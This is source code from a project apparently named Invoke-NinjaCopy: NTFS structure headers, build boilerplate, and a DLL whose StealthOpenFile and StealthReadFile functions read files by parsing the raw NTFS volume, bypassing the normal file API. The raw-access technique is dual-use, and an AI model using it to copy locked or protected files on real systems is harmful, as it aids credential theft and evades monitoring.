// boot code and the 0xAA55 marker. Declared under #pragma pack(1) above so
// the fields sum to exactly 512 bytes (one sector). Every value here is
// untrusted on-disk data; consumers are expected to check Signature against
// NTFS_SIGNATURE and sanity-check the geometry before relying on it.
typedef struct tagNTFS_BPB
{
	// jump instruction
	BYTE Jmp[3];

	// signature
	BYTE Signature[8];

	// BPB and extended BPB
	WORD BytesPerSector;
	BYTE SectorsPerCluster;
	WORD ReservedSectors;
	BYTE Zeros1[3];
	WORD NotUsed1;
	BYTE MediaDescriptor;
	WORD Zeros2;
	WORD SectorsPerTrack;
	WORD NumberOfHeads;
	DWORD HiddenSectors;
	DWORD NotUsed2;
	DWORD NotUsed3;
	ULONGLONG TotalSectors;
	ULONGLONG LCN_MFT;       // cluster number of $MFT
	ULONGLONG LCN_MFTMirr;   // cluster number of $MFTMirr
	DWORD ClustersPerFileRecord;
	DWORD ClustersPerIndexBlock;
	BYTE VolumeSN[8];

	// boot code
	BYTE Code[430];

	//0xAA55
	BYTE _AA;
	BYTE _55;
} NTFS_BPB;
60 | #pragma pack()
61 |
62 |
63 | // MFT Indexes
64 | #define MFT_IDX_MFT 0
65 | #define MFT_IDX_MFT_MIRR 1
66 | #define MFT_IDX_LOG_FILE 2
67 | #define MFT_IDX_VOLUME 3
68 | #define MFT_IDX_ATTR_DEF 4
69 | #define MFT_IDX_ROOT 5
70 | #define MFT_IDX_BITMAP 6
71 | #define MFT_IDX_BOOT 7
72 | #define MFT_IDX_BAD_CLUSTER 8
73 | #define MFT_IDX_SECURE 9
74 | #define MFT_IDX_UPCASE 10
75 | #define MFT_IDX_EXTEND 11
76 | #define MFT_IDX_RESERVED12 12
77 | #define MFT_IDX_RESERVED13 13
78 | #define MFT_IDX_RESERVED14 14
79 | #define MFT_IDX_RESERVED15 15
80 | #define MFT_IDX_USER 16
81 |
82 |
83 | /******************************
84 | File Record
85 | ---------------------
86 | | File Record Header|
87 | ---------------------
88 | | Attribute 1 |
89 | ---------------------
90 | | Attribute 2 |
91 | ---------------------
92 | | ...... |
93 | ---------------------
94 | | 0xFFFFFFFF |
95 | ---------------------
96 | *******************************/
97 |
98 | // File Record Header
99 |
100 | #define FILE_RECORD_MAGIC 'ELIF'
101 | #define FILE_RECORD_FLAG_INUSE 0x01 // File record is in use
102 | #define FILE_RECORD_FLAG_DIR 0x02 // File record is a directory
103 |
// Header at the start of every MFT file record; attributes follow at
// OffsetOfAttr and the list ends with 0xFFFFFFFF (see diagram above).
// OffsetOfUS/SizeOfUS, OffsetOfAttr, RealSize and AllocSize come straight
// off the disk: code walking a record should bound them against the record's
// allocated length before using them as offsets — that walker is not in this file.
typedef struct tagFILE_RECORD_HEADER
{
	DWORD Magic; // "FILE" — compared against the multi-char literal FILE_RECORD_MAGIC
	WORD OffsetOfUS; // Offset of Update Sequence
	WORD SizeOfUS; // Size in words of Update Sequence Number & Array
	ULONGLONG LSN; // $LogFile Sequence Number
	WORD SeqNo; // Sequence number
	WORD Hardlinks; // Hard link count
	WORD OffsetOfAttr; // Offset of the first Attribute
	WORD Flags; // Flags (FILE_RECORD_FLAG_INUSE / FILE_RECORD_FLAG_DIR)
	DWORD RealSize; // Real size of the FILE record
	DWORD AllocSize; // Allocated size of the FILE record
	ULONGLONG RefToBase; // File reference to the base FILE record
	WORD NextAttrId; // Next Attribute Id
	WORD Align; // Align to 4 byte boundary
	DWORD RecordNo; // Number of this MFT Record
} FILE_RECORD_HEADER;
121 |
122 |
123 | /******************************
124 | Attribute
125 | --------------------
126 | | Attribute Header |
127 | --------------------
128 | | Attribute Data |
129 | --------------------
130 | *******************************/
131 |
132 | // Attribute Header
133 |
134 | #define ATTR_TYPE_STANDARD_INFORMATION 0x10
135 | #define ATTR_TYPE_ATTRIBUTE_LIST 0x20
136 | #define ATTR_TYPE_FILE_NAME 0x30
137 | #define ATTR_TYPE_OBJECT_ID 0x40
138 | #define ATTR_TYPE_SECURITY_DESCRIPTOR 0x50
139 | #define ATTR_TYPE_VOLUME_NAME 0x60
140 | #define ATTR_TYPE_VOLUME_INFORMATION 0x70
141 | #define ATTR_TYPE_DATA 0x80
142 | #define ATTR_TYPE_INDEX_ROOT 0x90
143 | #define ATTR_TYPE_INDEX_ALLOCATION 0xA0
144 | #define ATTR_TYPE_BITMAP 0xB0
145 | #define ATTR_TYPE_REPARSE_POINT 0xC0
146 | #define ATTR_TYPE_EA_INFORMATION 0xD0
147 | #define ATTR_TYPE_EA 0xE0
148 | #define ATTR_TYPE_LOGGED_UTILITY_STREAM 0x100
149 |
150 | #define ATTR_FLAG_COMPRESSED 0x0001
151 | #define ATTR_FLAG_ENCRYPTED 0x4000
152 | #define ATTR_FLAG_SPARSE 0x8000
153 |
// Leading part shared by resident and non-resident attribute headers.
// TotalSize is the stride to the next attribute and NameOffset/NameLength
// locate the optional name; both are on-disk values and need bounding
// against the enclosing record before use.
typedef struct tagATTR_HEADER_COMMON
{
	DWORD Type; // Attribute Type (ATTR_TYPE_* above)
	DWORD TotalSize; // Length (including this header)
	BYTE NonResident; // 0 - resident, 1 - non resident
	BYTE NameLength; // name length in words
	WORD NameOffset; // offset to the name
	WORD Flags; // Flags (ATTR_FLAG_COMPRESSED / ENCRYPTED / SPARSE)
	WORD Id; // Attribute Id
} ATTR_HEADER_COMMON;
164 |
// Header of an attribute whose body is stored inside the file record
// (Header.NonResident == 0); the body starts AttrOffset bytes from the
// header and is AttrSize bytes long.
typedef struct tagATTR_HEADER_RESIDENT
{
	ATTR_HEADER_COMMON Header; // Common data structure
	DWORD AttrSize; // Length of the attribute body
	WORD AttrOffset; // Offset to the Attribute
	BYTE IndexedFlag; // Indexed flag
	BYTE Padding; // Padding
} ATTR_HEADER_RESIDENT;
173 |
// Header of an attribute whose body lives in clusters outside the record
// (Header.NonResident == 1); the cluster mapping is the data-run list found
// DataRunOffset bytes from the header, covering StartVCN..LastVCN.
typedef struct tagATTR_HEADER_NON_RESIDENT
{
	ATTR_HEADER_COMMON Header; // Common data structure
	ULONGLONG StartVCN; // Starting VCN
	ULONGLONG LastVCN; // Last VCN
	WORD DataRunOffset; // Offset to the Data Runs
	WORD CompUnitSize; // Compression unit size
	DWORD Padding; // Padding
	ULONGLONG AllocSize; // Allocated size of the attribute
	ULONGLONG RealSize; // Real size of the attribute
	ULONGLONG IniSize; // Initialized data size of the stream
} ATTR_HEADER_NON_RESIDENT;
186 |
187 |
188 | // Attribute: STANDARD_INFORMATION
189 |
190 | #define ATTR_STDINFO_PERMISSION_READONLY 0x00000001
191 | #define ATTR_STDINFO_PERMISSION_HIDDEN 0x00000002
192 | #define ATTR_STDINFO_PERMISSION_SYSTEM 0x00000004
193 | #define ATTR_STDINFO_PERMISSION_ARCHIVE 0x00000020
194 | #define ATTR_STDINFO_PERMISSION_DEVICE 0x00000040
195 | #define ATTR_STDINFO_PERMISSION_NORMAL 0x00000080
196 | #define ATTR_STDINFO_PERMISSION_TEMP 0x00000100
197 | #define ATTR_STDINFO_PERMISSION_SPARSE 0x00000200
198 | #define ATTR_STDINFO_PERMISSION_REPARSE 0x00000400
199 | #define ATTR_STDINFO_PERMISSION_COMPRESSED 0x00000800
200 | #define ATTR_STDINFO_PERMISSION_OFFLINE 0x00001000
201 | #define ATTR_STDINFO_PERMISSION_NCI 0x00002000
202 | #define ATTR_STDINFO_PERMISSION_ENCRYPTED 0x00004000
203 |
// Body of a $STANDARD_INFORMATION attribute (type 0x10): timestamps, DOS
// permission bits (ATTR_STDINFO_PERMISSION_*) and the quota/USN fields.
typedef struct tagATTR_STANDARD_INFORMATION
{
	ULONGLONG CreateTime; // File creation time
	ULONGLONG AlterTime; // File altered time
	ULONGLONG MFTTime; // MFT changed time
	ULONGLONG ReadTime; // File read time
	DWORD Permission; // Dos file permission
	DWORD MaxVersionNo; // Maximum number of file versions
	DWORD VersionNo; // File version number
	DWORD ClassId; // Class Id
	DWORD OwnerId; // Owner Id
	DWORD SecurityId; // Security Id
	ULONGLONG QuotaCharged; // Quota charged
	ULONGLONG USN; // USN Journal
} ATTR_STANDARD_INFORMATION;
219 |
220 |
221 | // Attribute: ATTRIBUTE_LIST
222 |
// One entry of an $ATTRIBUTE_LIST attribute (type 0x20): points at an
// attribute that may live in a different file record (BaseRef). RecordSize
// is the stride to the next entry.
typedef struct tagATTR_ATTRIBUTE_LIST
{
	DWORD AttrType; // Attribute type
	WORD RecordSize; // Record length
	BYTE NameLength; // Name length in characters
	BYTE NameOffset; // Name offset
	ULONGLONG StartVCN; // Start VCN
	ULONGLONG BaseRef; // Base file reference to the attribute
	WORD AttrId; // Attribute Id
} ATTR_ATTRIBUTE_LIST;
233 |
234 | // Attribute: FILE_NAME
235 |
236 | #define ATTR_FILENAME_FLAG_READONLY 0x00000001
237 | #define ATTR_FILENAME_FLAG_HIDDEN 0x00000002
238 | #define ATTR_FILENAME_FLAG_SYSTEM 0x00000004
239 | #define ATTR_FILENAME_FLAG_ARCHIVE 0x00000020
240 | #define ATTR_FILENAME_FLAG_DEVICE 0x00000040
241 | #define ATTR_FILENAME_FLAG_NORMAL 0x00000080
242 | #define ATTR_FILENAME_FLAG_TEMP 0x00000100
243 | #define ATTR_FILENAME_FLAG_SPARSE 0x00000200
244 | #define ATTR_FILENAME_FLAG_REPARSE 0x00000400
245 | #define ATTR_FILENAME_FLAG_COMPRESSED 0x00000800
246 | #define ATTR_FILENAME_FLAG_OFFLINE 0x00001000
247 | #define ATTR_FILENAME_FLAG_NCI 0x00002000
248 | #define ATTR_FILENAME_FLAG_ENCRYPTED 0x00004000
249 | #define ATTR_FILENAME_FLAG_DIRECTORY 0x10000000
250 | #define ATTR_FILENAME_FLAG_INDEXVIEW 0x20000000
251 |
252 | #define ATTR_FILENAME_NAMESPACE_POSIX 0x00
253 | #define ATTR_FILENAME_NAMESPACE_WIN32 0x01
254 | #define ATTR_FILENAME_NAMESPACE_DOS 0x02
255 |
// Body of a $FILE_NAME attribute (type 0x30). Variable length: Name[1] is a
// placeholder for NameLength UTF-16 code units that follow the fixed part, so
// sizeof(ATTR_FILE_NAME) is not the size of an instance.
typedef struct tagATTR_FILE_NAME
{
	ULONGLONG ParentRef; // File reference to the parent directory
	ULONGLONG CreateTime; // File creation time
	ULONGLONG AlterTime; // File altered time
	ULONGLONG MFTTime; // MFT changed time
	ULONGLONG ReadTime; // File read time
	ULONGLONG AllocSize; // Allocated size of the file
	ULONGLONG RealSize; // Real size of the file
	DWORD Flags; // Flags (ATTR_FILENAME_FLAG_*)
	DWORD ER; // Used by EAs and Reparse
	BYTE NameLength; // Filename length in characters
	BYTE NameSpace; // Filename space (ATTR_FILENAME_NAMESPACE_*)
	WORD Name[1]; // Filename (first of NameLength code units)
} ATTR_FILE_NAME;
271 |
272 |
273 | // Attribute: VOLUME_INFORMATION
274 |
275 | #define ATTR_VOLINFO_FLAG_DIRTY 0x0001 // Dirty
276 | #define ATTR_VOLINFO_FLAG_RLF 0x0002 // Resize logfile
277 | #define ATTR_VOLINFO_FLAG_UOM 0x0004 // Upgrade on mount
278 | #define ATTR_VOLINFO_FLAG_MONT 0x0008 // Mounted on NT4
279 | #define ATTR_VOLINFO_FLAG_DUSN 0x0010 // Delete USN underway
280 | #define ATTR_VOLINFO_FLAG_ROI 0x0020 // Repair object Ids
281 | #define ATTR_VOLINFO_FLAG_MBC 0x8000 // Modified by chkdsk
282 |
// Body of a $VOLUME_INFORMATION attribute (type 0x70): NTFS version and the
// ATTR_VOLINFO_FLAG_* state bits (dirty, chkdsk, ...).
typedef struct tagATTR_VOLUME_INFORMATION
{
	BYTE Reserved1[8]; // Always 0 ?
	BYTE MajorVersion; // Major version
	BYTE MinorVersion; // Minor version
	WORD Flags; // Flags
	BYTE Reserved2[4]; // Always 0 ?
} ATTR_VOLUME_INFORMATION;
291 |
292 |
293 | // Attribute: INDEX_ROOT
294 | /******************************
295 | INDEX_ROOT
296 | ---------------------
297 | | Index Root Header |
298 | ---------------------
299 | | Index Header |
300 | ---------------------
301 | | Index Entry |
302 | ---------------------
303 | | Index Entry |
304 | ---------------------
305 | | ...... |
306 | ---------------------
307 | *******************************/
308 |
309 | #define ATTR_INDEXROOT_FLAG_SMALL 0x00 // Fits in Index Root File Record
310 | #define ATTR_INDEXROOT_FLAG_LARGE 0x01 // Index Allocation and Bitmap needed
311 |
// Body of an $INDEX_ROOT attribute (type 0x90): the index root header followed
// by the index header that positions the entries (see diagram above). Flags
// tells whether the index fits here (ATTR_INDEXROOT_FLAG_SMALL) or spills
// into $INDEX_ALLOCATION (ATTR_INDEXROOT_FLAG_LARGE). EntryOffset and the
// two sizes are on-disk values and need bounding against the attribute body.
typedef struct tagATTR_INDEX_ROOT
{
	// Index Root Header
	DWORD AttrType; // Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)
	DWORD CollRule; // Collation rule
	DWORD IBSize; // Size of index block
	BYTE ClustersPerIB; // Clusters per index block (same as BPB?)
	BYTE Padding1[3]; // Padding
	// Index Header
	DWORD EntryOffset; // Offset to the first index entry, relative to this address(0x10)
	DWORD TotalEntrySize; // Total size of the index entries
	DWORD AllocEntrySize; // Allocated size of the index entries
	BYTE Flags; // Flags
	BYTE Padding2[3]; // Padding
} ATTR_INDEX_ROOT;
327 |
328 |
329 | // INDEX ENTRY
330 |
331 | #define INDEX_ENTRY_FLAG_SUBNODE 0x01 // Index entry points to a sub-node
332 | #define INDEX_ENTRY_FLAG_LAST 0x02 // Last index entry in the node, no Stream
333 |
// One entry of an index node. Variable length: Size is the stride to the
// next entry and Stream[1] stands for StreamSize bytes of key data; when
// INDEX_ENTRY_FLAG_SUBNODE is set the child VCN sits in the last 8 bytes of
// the entry (Size - 8). Both Size and StreamSize are untrusted on-disk
// values and should be checked against the enclosing node before use.
typedef struct tagINDEX_ENTRY
{
	ULONGLONG FileReference; // Low 6B: MFT record index, High 2B: MFT record sequence number
	WORD Size; // Length of the index entry
	WORD StreamSize; // Length of the stream
	BYTE Flags; // Flags (INDEX_ENTRY_FLAG_SUBNODE / INDEX_ENTRY_FLAG_LAST)
	BYTE Padding[3]; // Padding
	BYTE Stream[1]; // Stream
	// VCN of the sub node in Index Allocation, Offset = Size - 8
} INDEX_ENTRY;
344 |
345 |
346 | // INDEX BLOCK
347 | /******************************
348 | INDEX_BLOCK
349 | -----------------------
350 | | Index Block Header |
351 | -----------------------
352 | | Index Header |
353 | -----------------------
354 | | Index Entry |
355 | -----------------------
356 | | Index Entry |
357 | -----------------------
358 | | ...... |
359 | -----------------------
360 | *******************************/
361 |
362 | #define INDEX_BLOCK_MAGIC 'XDNI'
363 |
// Header of an index block inside $INDEX_ALLOCATION (see diagram above):
// the block header (Magic "INDX", update sequence, LSN, VCN) followed by the
// index header that positions the entries. Like FILE_RECORD_HEADER, the
// update-sequence offsets and EntryOffset come from disk and must be bounded
// against the block size before they are used.
typedef struct tagINDEX_BLOCK
{
	// Index Block Header
	DWORD Magic; // "INDX" — compared against the multi-char literal INDEX_BLOCK_MAGIC
	WORD OffsetOfUS; // Offset of Update Sequence
	WORD SizeOfUS; // Size in words of Update Sequence Number & Array
	ULONGLONG LSN; // $LogFile Sequence Number
	ULONGLONG VCN; // VCN of this index block in the index allocation
	// Index Header
	DWORD EntryOffset; // Offset of the index entries, relative to this address(0x18)
	DWORD TotalEntrySize; // Total size of the index entries
	DWORD AllocEntrySize; // Allocated size of index entries
	BYTE NotLeaf; // 1 if not leaf node (has children)
	BYTE Padding[3]; // Padding
} INDEX_BLOCK;
379 |
380 | #endif
381 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_DataType.h"
21 |
22 | using namespace std;
23 |
// Per-open-file state handed back to callers as an opaque HANDLE by
// StealthOpenFile() and torn down by StealthCloseFile().
struct FileInfo_t
{
	CNTFSVolume* volume;      // raw NTFS volume the file lives on; created in StealthOpenFile
	CFileRecord* fileRecord;  // MFT record of the target file; NOTE(review): never deleted by StealthCloseFile
	CIndexEntry* indexEntry;  // scratch entry reused for each directory lookup while walking the path
	CAttrBase* data;          // result of fileRecord->FindStream(); may be NULL (StealthReadFile returns 2)
};
31 |
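// Frees everything a failed StealthOpenFile() allocated. Mirrors exactly the
// deletes StealthCloseFile() performs (indexEntry, volume, the struct itself;
// data is still NULL on every failure path). fileRecord is deliberately not
// deleted: whether CFileRecord owns the attribute objects it hands out via
// FindStream() is not visible in this file, so freeing it here could double
// free. TODO(review): confirm CFileRecord ownership and release it too.
static void DiscardFileInfo(FileInfo_t* fileInfo)
{
	if (!fileInfo)
		return;
	delete fileInfo->indexEntry;
	delete fileInfo->volume;
	delete fileInfo;
}

// Opens a file by raw NTFS parsing, bypassing the normal file API.
//
// filePathCStr: full path of the form "C:\dir\file"; the first character is
//               taken as the drive letter.
// Returns an opaque HANDLE (really a FileInfo_t*) for StealthReadFile /
// StealthCloseFile, or NULL if the path is unusable, the volume is not NTFS,
// or any component cannot be resolved. The original leaked every allocation
// on those failure paths; this version releases them.
extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)
{
	// Reject NULL/empty input up front: std::string(NULL) is undefined and
	// at(0) on an empty string would throw through this extern "C" boundary.
	if (!filePathCStr || !filePathCStr[0])
		return NULL;

	string filePath(filePathCStr);
	// Drive letter. The (const _TCHAR*) casts below reinterpret narrow
	// std::string buffers and are only correct when _TCHAR is char
	// (a non-UNICODE build); a UNICODE build would need a real conversion.
	_TCHAR volumeName = filePath[0];

	// Value-initialise so every pointer starts NULL and cleanup is safe on any path.
	FileInfo_t* fileInfo = new FileInfo_t();

	fileInfo->volume = new CNTFSVolume(volumeName);
	if (!fileInfo->volume->IsVolumeOK())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// Parse the root directory; only the directory index attributes are
	// needed while walking path components.
	fileInfo->fileRecord = new CFileRecord(fileInfo->volume);
	fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);
	if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT) ||
	    !fileInfo->fileRecord->ParseAttrs())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// Walk each '\'-delimited directory component, descending one MFT record
	// at a time. When the path holds no '\' at all, dirs is npos and dirs + 1
	// wraps to 0, so the whole string is treated as a file name in the root
	// (same outcome as the original int arithmetic).
	fileInfo->indexEntry = new CIndexEntry;
	string::size_type dirs = filePath.find(_T('\\'));
	string::size_type dire = filePath.find(_T('\\'), dirs + 1);

	while (dire != string::npos)
	{
		string pathname = filePath.substr(dirs + 1, dire - dirs - 1);
		const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();

		// The original distinguished compressed/encrypted directories after
		// a ParseAttrs() failure but returned NULL in every case, so the
		// distinction is folded into one failure path.
		if (!fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)) ||
		    !fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()) ||
		    !fileInfo->fileRecord->ParseAttrs())
		{
			DiscardFileInfo(fileInfo);
			return NULL;
		}

		dirs = dire;
		dire = filePath.find(_T('\\'), dirs + 1);
	}

	// Last component is the file itself.
	string fileName = filePath.substr(dirs + 1);
	const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();
	if (!fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)) ||
	    !fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// From here on only the $DATA attribute matters.
	fileInfo->fileRecord->SetAttrMask(MASK_DATA);
	if (!fileInfo->fileRecord->ParseAttrs())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// May be NULL when no data stream is found; StealthReadFile reports that as 2.
	fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();
	return fileInfo;
}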
122 |
123 |
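// Reads up to bufferSize bytes of the opened file's data stream, starting at
// byte offset `offset`.
//
// On success returns 0, stores the number of bytes copied into *bytesRead and
// the number of bytes still following the copied range into *dataRemaining.
// Non-zero codes (existing callers need only treat non-zero as failure):
//   1 - offset lies beyond the end of the stream (the original's code 1 was
//       unreachable, since the read length is already clamped to a DWORD)
//   2 - the file has no data stream (fileInfo->data is NULL)
//   3 - ReadData() failed or returned fewer bytes than requested
//   4 - fileInfo, buffer, bytesRead or dataRemaining is NULL
extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)
{
	if (!fileInfo || !buffer || !bytesRead || !dataRemaining)
		return 4;
	if (!fileInfo->data)
		return 2;

	ULONGLONG fullDataLength = (ULONGLONG)fileInfo->data->GetDataSize();

	// The original computed dataLength - offset unchecked; for offset > size
	// that wraps to a huge value and a read past the end is attempted.
	if (offset > fullDataLength)
		return 1;

	ULONGLONG remaining = fullDataLength - offset;
	// Clamp to the caller's buffer; the result then always fits in a DWORD.
	DWORD toRead = (remaining > bufferSize) ? bufferSize : (DWORD)remaining;

	// ReadData's behaviour for toRead == 0 is not visible here; it is invoked
	// exactly as the original did.
	DWORD len = 0;
	if (!fileInfo->data->ReadData(offset, buffer, toRead, &len) || len != toRead)
		return 3;

	*bytesRead = len;
	*dataRemaining = remaining - len;
	return 0; // Success
}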
153 |
154 |
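// Releases a handle returned by StealthOpenFile(). Accepts NULL (which
// StealthOpenFile returns on failure); the original dereferenced it.
extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)
{
	if (!fileInfo)
		return;

	delete (fileInfo->data);       // object obtained from fileRecord->FindStream()
	delete (fileInfo->indexEntry);
	delete (fileInfo->volume);
	// NOTE(review): fileInfo->fileRecord is not deleted, as in the original.
	// Whether CFileRecord also owns the attribute freed as `data` above is not
	// visible in this file, so deleting it here unverified could double free;
	// the leak is kept and flagged. TODO: confirm ownership and fix properly.
	delete fileInfo;
}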
162 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}
23 | Win32Proj
24 | NTFSParserDLL
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v110
31 | NotSet
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v110
37 | NotSet
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v110_xp
43 | true
44 | NotSet
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v110_xp
50 | true
51 | NotSet
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 |
92 |
93 |
94 |
95 | Use
96 | Level3
97 | Disabled
98 | WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
99 |
100 |
101 | Windows
102 | true
103 |
104 |
105 |
106 |
107 | Level3
108 | Use
109 | MaxSpeed
110 | true
111 | true
112 | WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
113 | MultiThreaded
114 |
115 |
116 | Windows
117 | true
118 | true
119 | true
120 |
121 |
122 |
123 |
124 | Level3
125 | Use
126 | MaxSpeed
127 | true
128 | true
129 | WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
130 | MultiThreaded
131 |
132 |
133 | Windows
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 | false
149 | false
150 |
151 |
152 |
153 |
154 | false
155 | false
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 | Create
164 | Create
165 | Create
166 | Create
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
